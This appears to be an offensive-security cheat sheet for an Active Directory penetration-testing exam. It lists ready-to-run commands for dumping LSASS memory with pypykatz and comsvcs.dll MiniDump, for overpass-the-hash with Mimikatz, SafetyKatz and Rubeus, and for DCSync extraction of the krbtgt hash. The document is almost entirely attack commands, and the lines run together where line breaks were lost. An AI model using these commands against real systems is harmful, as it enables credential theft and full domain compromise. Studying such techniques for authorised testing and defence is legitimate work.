Extracting Credentials from LSASS
pypykatz.exe live lsa(Get-Process -ProcessName lsass).Idtasklist /FI "IMAGENAME eq lsass.exe"rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <lsass process ID> C:\Users\Public\lsass.dmp fullOverPass-The-Hash
OPTH generate tokens from hashes or keys.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:domain.name /aes256:<aes256key> /run:powershell.exe"'SafetyKatz.exe "sekurlsa::pth /user:Administrator /domain:domain.name /aes256:<aes256keys> /run:cmd.exe" "exit"Commands start a PowerShell/cmd.exe session with a logon type 9 (same as runas /netonly)
Rubeus.exe asktgt /user:Adminstrator /rc4:<ntlmhash> /pttRubeus.exe asktgt /user:Adminstrator /aes256:<aes256keys> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /pttDCSync
To extract credentials from the DC without code execution on it, we can use DCSync.
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"By default, Domain Admin privileges are required to run DCSync, but during the exam please verify.